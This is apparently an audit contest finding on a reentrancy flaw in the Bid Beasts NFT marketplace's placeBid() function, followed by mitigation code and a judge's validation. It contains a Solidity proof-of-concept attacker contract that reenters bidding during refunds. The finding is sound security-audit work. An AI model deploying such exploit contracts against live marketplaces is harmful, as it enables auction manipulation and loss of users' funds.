Bid Beasts

First Flight #49
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: medium
Valid

### [M-1]: Reentrancy Vulnerability in `placeBid()` Function


Severity: Medium
Impact: Auction Manipulation
Likelihood: Medium

Description:
The placeBid() function performs external calls to refund previous bidders before updating the bid state, creating a reentrancy opportunity.

Vulnerable Code:

```solidity
function placeBid(uint256 tokenId) external payable isListed(tokenId) {
    // ...
    if (previousBidder != address(0)) {
        _payout(previousBidder, previousBidAmount); // External call first
    }
    bids[tokenId] = Bid(msg.sender, msg.value); // State change after
    // ...
}
```

Attack Scenario:

  1. Attacker places initial bid
  2. Legitimate user places higher bid
  3. During refund, attacker's receive() function reenters placeBid()
  4. Attacker can potentially manipulate auction state or timing

Proof of Concept:

```solidity
contract ReentrancyExploit {
    BidBeastsNFTMarketplace marketplace;
    uint256 targetTokenId;
    bool attacking;

    constructor(address _marketplace) {
        marketplace = BidBeastsNFTMarketplace(_marketplace);
    }

    function setupAttack(uint256 tokenId) external payable {
        targetTokenId = tokenId;
        // Place initial bid
        marketplace.placeBid{value: msg.value}(tokenId);
    }

    function attack() external payable {
        attacking = true;
        // This will trigger our receive() during refund
        marketplace.placeBid{value: msg.value}(targetTokenId);
    }

    receive() external payable {
        if (attacking) {
            attacking = false;
            // Reenter during refund process
            // State is inconsistent: old bid still recorded but new bid being processed
            // Potential manipulations:
            // - Check auction timing
            // - Query bid state (may see inconsistent data)
            // - Attempt additional bids while state is inconsistent
            // Example: Try to place another bid while in inconsistent state
            if (address(this).balance > 0.01 ether) {
                try marketplace.placeBid{value: 0.01 ether}(targetTokenId) {
                    // If successful, we've manipulated the auction
                } catch {
                    // Expected to fail, but state was still inconsistent
                }
            }
        }
    }
}
```

Attack Vector:

  1. Attacker places initial bid
  2. Legitimate user places higher bid
  3. During _payout() to attacker, receive() function executes
  4. Attacker can query contract state before bids[tokenId] is updated
  5. Potential for state manipulation or information extraction

Recommended Mitigation:

  • Use OpenZeppelin's ReentrancyGuard
  • OR move state updates before external calls (Checks-Effects-Interactions pattern)

```solidity
// Update state first
bids[tokenId] = Bid(msg.sender, msg.value);
// Then make external calls
if (previousBidder != address(0)) {
    _payout(previousBidder, previousBidAmount);
}
```
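As an added illustration (not code from the Bid Beasts project or this submission), the snippet below combines both recommendations and goes one step further: the outbid party's refund is credited to a ledger and withdrawn separately (pull payment), so `placeBid()` makes no external call at all. This removes the reentrancy window and also stops a bidder whose `receive()` reverts or burns gas from blocking the next bid. The `Bid` struct, `bids` mapping and `isListed` modifier are assumed stand-ins for the marketplace's own; listing logic is omitted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// OpenZeppelin v5 path; in v4 the file lives under security/ReentrancyGuard.sol
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

/// Minimal stand-in for the marketplace: only the pieces placeBid() touches.
/// How a token becomes listed is out of scope here and is omitted.
contract HardenedBidding is ReentrancyGuard {
    struct Bid { address bidder; uint256 amount; }

    mapping(uint256 => bool) public listed;
    mapping(uint256 => Bid) public bids;
    // Pull-payment ledger: refunds are credited here, never pushed from placeBid().
    mapping(address => uint256) public pendingRefunds;

    event BidPlaced(uint256 indexed tokenId, address indexed bidder, uint256 amount);
    event RefundQueued(address indexed bidder, uint256 amount);

    modifier isListed(uint256 tokenId) {
        require(listed[tokenId], "not listed");
        _;
    }

    function placeBid(uint256 tokenId) external payable isListed(tokenId) nonReentrant {
        // Checks
        Bid memory previous = bids[tokenId];
        require(msg.value > previous.amount, "bid too low");

        // Effects: every storage write happens before any value could leave the contract
        bids[tokenId] = Bid(msg.sender, msg.value);
        if (previous.bidder != address(0)) {
            pendingRefunds[previous.bidder] += previous.amount;
            emit RefundQueued(previous.bidder, previous.amount);
        }
        emit BidPlaced(tokenId, msg.sender, msg.value);
        // Interactions: none. The outbid party withdraws on their own, so a
        // reverting or gas-hungry receive() can neither reenter nor block bidding.
    }

    function withdrawRefund() external nonReentrant {
        uint256 amount = pendingRefunds[msg.sender];
        require(amount > 0, "nothing to withdraw");
        pendingRefunds[msg.sender] = 0; // effect before the interaction below
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

A Foundry test for this shape should assert that a second `placeBid()` from inside a refund path reverts with the guard's error and that `pendingRefunds` equals the outbid amount after the higher bid lands.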
Updates

Lead Judging Commences

cryptoghost Lead Judge 2 months ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeast Marketplace: Reentrancy In PlaceBid

BidBeast Marketplace has a Medium-severity reentrancy vulnerability in its "buy-now" feature that allows an attacker to disrupt the platform by blocking sales or inflating gas fees for legitimate users.
